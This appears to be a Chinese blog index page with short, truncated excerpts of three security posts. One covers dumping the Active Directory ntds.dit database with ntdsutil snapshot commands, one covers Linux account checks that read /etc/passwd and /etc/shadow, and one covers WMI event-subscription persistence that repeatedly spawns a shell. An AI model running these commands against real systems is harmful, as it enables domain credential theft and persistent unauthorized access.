摘要:
一、通过ntdsutil.exe提取ntds.dit 1.在域控制器的命令行环境中创建一个快照 ntdsutil snapshot "activate instance ntds" create quit quit 2.加载创建的快照 ntdsutil snapshot "mount {b06940 阅读全文
posted @ 2021-08-27 21:21
Ctrl_C+Ctrl_V
阅读(341)
评论(0)
推荐(0)
摘要:
一、查看用户信息 /etc/passwd 查看用户信息文件 /etc/shadow 查看影子文件 awk -F: '$3==0{print $1}' /etc/passwd (查看系统是否还存在其他的特权账户,uid为0,默认系统只存在root一个特权账户) who 查看当前登录用户(tty 本地登 阅读全文
posted @ 2021-08-27 21:15
Ctrl_C+Ctrl_V
阅读(119)
评论(0)
推荐(0)
摘要:
一、WMI 由于WMI的事件会循环执行,为确保不会无限弹shell,可以使用系统启动时间来限制(只要触发延时可以落在限定区间即可,有些机器启动慢因此起始时间调高些 二、执行如下命令 wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CR 阅读全文
posted @ 2021-08-27 20:51
Ctrl_C+Ctrl_V
阅读(444)
评论(0)
推荐(0)
浙公网安备 33010602011771号